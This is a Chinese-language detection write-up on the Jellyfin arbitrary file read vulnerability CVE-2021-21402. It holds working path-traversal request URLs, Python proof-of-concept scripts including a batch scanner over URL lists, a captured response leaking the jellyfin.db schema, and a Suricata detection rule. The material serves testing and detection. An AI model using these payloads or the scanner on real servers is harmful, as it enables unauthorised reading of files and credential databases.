跳转至

T1190-CVE-2021-21402-Jellyfin任意文件读取漏洞

来自ATT&CK的描述

使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。

如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。

对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。

测试案例

Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。

影响范围:Jellyfin<10.7.1

检测日志

HTTP

测试复现

利用POC

从服务器下载带有密码的jellyfin.db:

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

未经授权读取windows的文件

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/

读取host文件

/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3/

读取带有密码的数据库文件

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

Python_POC

#批量ip
import requests
import sys
import urllib3
urllib3.disable_warnings()

if len(sys.argv)!=2:
    print('Usage: python3  xxx.py  urls.txt')
    sys.exit()
txt= sys.argv[1]
f=open(txt,'r+')
for i in f.readlines():  
    url=i.strip()
    url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
                "Content-Type": "application/octet-stream"
    }
    response=requests.get(url,headers=headers,verify=False)
    if response.status_code==200:
        print(url+"  "+"存在漏洞")

    else:
        print(url+"  "+"不存在漏洞")
#单个ip
import requests
import sys
import urllib3
urllib3.disable_warnings()

if len(sys.argv)!=2:  
    print('Usage: python3  xxx.py  http://xxx.xxx.xxx.xxx ')
    sys.exit()
url= sys.argv[1]
url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
                "Content-Type": "application/octet-stream"
    }
response=requests.get(url,headers=headers,verify=False)
if response.status_code==200:
    print("存在漏洞")

else:
    print("不存在漏洞")

测试留痕

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host: 10.16.45.164:5577
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 10:13:59 GMT
Content-Type: application/octet-stream
Server: Microsoft-NetCore/2.0, UPnP/1.0 DLNADOC/1.50
Content-Length: 331776
Cache-Control: public
Last-Modified: Sun, 04 Apr 2021 15:34:24 GMT
Accept-Ranges: bytes
Age: 326376
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Cookie, Date, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, Want-Digest, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: 110.93.247.208:5577

SQLite format 3......@  [email protected]...............................................................@..?...........................................................}...?+...indexIX_AccessSchedules_UserIdAccessSchedules.CREATE INDEX "IX_AccessSchedules_UserId" ON "AccessSchedules" ("UserId").<
..##..?tablePreferencesPreferences.CREATE TABLE "Preferences" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_Preferences" PRIMARY KEY AUTOINCREMENT,
    "Kind" INTEGER NOT NULL,
    "Value" TEXT NOT NULL,
    "RowVersion" INTEGER NOT NULL,
    "Preference_Preferences_Guid" TEXT NULL,
    CONSTRAINT "FK_Preferences_Users_Preference_Preferences_Guid" FOREIGN KEY ("Preference_Preferences_Guid") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).? ..##..EtablePermissionsPermissions
CREATE TABLE "Permissions" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_Permissions" PRIMARY KEY AUTOINCREMENT,
    "Kind" INTEGER NOT NULL,
    "Value" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL,
    "Permission_Permissions_Guid" TEXT NULL,
    CONSTRAINT "FK_Permissions_Users_Permission_Permissions_Guid" FOREIGN KEY ("Permission_Permissions_Guid") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).X...!!..{tableImageInfosImageInfos    CREATE TABLE "ImageInfos" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_ImageInfos" PRIMARY KEY AUTOINCREMENT,
    "UserId" TEXT NULL,
    "Path" TEXT NOT NULL,
    "LastModified" TEXT NOT NULL,
    CONSTRAINT "FK_ImageInfos_Users_UserId" FOREIGN KEY ("UserId") REFERENCES "Users" ("Id") ON DELETE RESTRICT
).....++..etableAccessSchedulesAccessSchedules.CREATE TABLE "AccessSchedules" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_AccessSchedules" PRIMARY KEY AUTOINCREMENT,
    "UserId" TEXT NOT NULL,
    "DayOfWeek" INTEGER NOT NULL,
    "StartHour" REAL NOT NULL,
    "EndHour" REAL NOT NULL,
    CONSTRAINT "FK_AccessSchedules_Users_UserId" FOREIGN KEY ("UserId") REFERENCES "Users" ("Id") ON DELETE CASCADE
)..........tableUsersUsers.CREATE TABLE "Users" (
    "Id" TEXT NOT NULL CONSTRAINT "PK_Users" PRIMARY KEY,
    "Username" TEXT NOT NULL,
    "Password" TEXT NULL,
    "EasyPassword" TEXT NULL,
    "MustUpdatePassword" INTEGER NOT NULL,
    "AudioLanguagePreference" TEXT NULL,
    "AuthenticationProviderId" TEXT NOT NULL,
    "PasswordResetProviderId" TEXT NOT NULL,
    "InvalidLoginAttemptCount" INTEGER NOT NULL,
    "LastActivityDate" TEXT NULL,
    "LastLoginDate" TEXT NULL,
    "LoginAttemptsBeforeLockout" INTEGER NULL,
    "SubtitleMode" INTEGER NOT NULL,
    "PlayDefaultAudioTrack" INTEGER NOT NULL,
    "SubtitleLanguagePreference" TEXT NULL,
    "DisplayMissingEpisodes" INTEGER NOT NULL,
    "DisplayCollectionsView" INTEGER NOT NULL,
    "EnableLocalPassword" INTEGER NOT NULL,
    "HidePlayedInLatest" INTEGER NOT NULL,
    "RememberAudioSelections" INTEGER NOT NULL,
    "RememberSubtitleSelections" INTEGER NOT NULL,
    "EnableNextEpisodeAutoPlay" INTEGER NOT NULL,
    "EnableAutoLogin" INTEGER NOT NULL,
    "EnableUserPreferenceAccess" INTEGER NOT NULL,
    "MaxParentalAgeRating" INTEGER NULL,
    "RemoteClientBitrateLimit" INTEGER NULL,
    "InternalId" INTEGER NOT NULL,
    "SyncPlayAccess" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL
))...=...indexsqlite_autoindex_Users_1Users.P...++.Ytablesqlite_sequencesqlite_sequence.CREATE TABLE sqlite_sequence(name,seq).)...%%...tableActivityLogsActivityLogs.CREATE TABLE "ActivityLogs" (
    "Id" INTEGER NOT NULL CONSTRAINT "PK_ActivityLogs" PRIMARY KEY AUTOINCREMENT,
    "Name" TEXT NOT NULL,
    "Overview" TEXT NULL,
    "ShortOverview" TEXT NULL,
    "Type" TEXT NOT NULL,
    "UserId" TEXT NOT NULL,
    "ItemId" TEXT NULL,
    "DateCreated" TEXT NOT NULL,
    "LogSeverity" INTEGER NOT NULL,
    "RowVersion" INTEGER NOT NULL
).X...77..Otable__EFMigrationsHistory__EFMigrationsHistory.CREATE TABLE "__EFMigrationsHistory" (
    "MigrationId" TEXT NOT NULL CONSTRAINT "PK___EFMigrationsHistory" PRIMARY KEY,
    "ProductVersion" TEXT NOT NULL
)I...]7..indexsqlite_autoindex___EFMigrationsHistory_1__EFMigrationsHistor
......

检测规则/思路

Suricata规则

alert http any any -> any any (msg:"CVE-2021-21402-Jellyfin任意文件读取";flow:established,to_server;content:"GET";http_method;content:"/Audio/";pcre:"/hls/";pcre:"/stream/";http_uri;reference:url,www.cnblogs.com/0day-li/p/14637768.html;classtype:web-application-attck;sid:3002021;rev:1;)

建议

流量+安全设备比较容易检测到此攻击行为。

参考推荐

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/

Jellyfin任意文件读取漏洞(CVE-2021-21402)

https://www.cnblogs.com/0day-li/p/14637768.html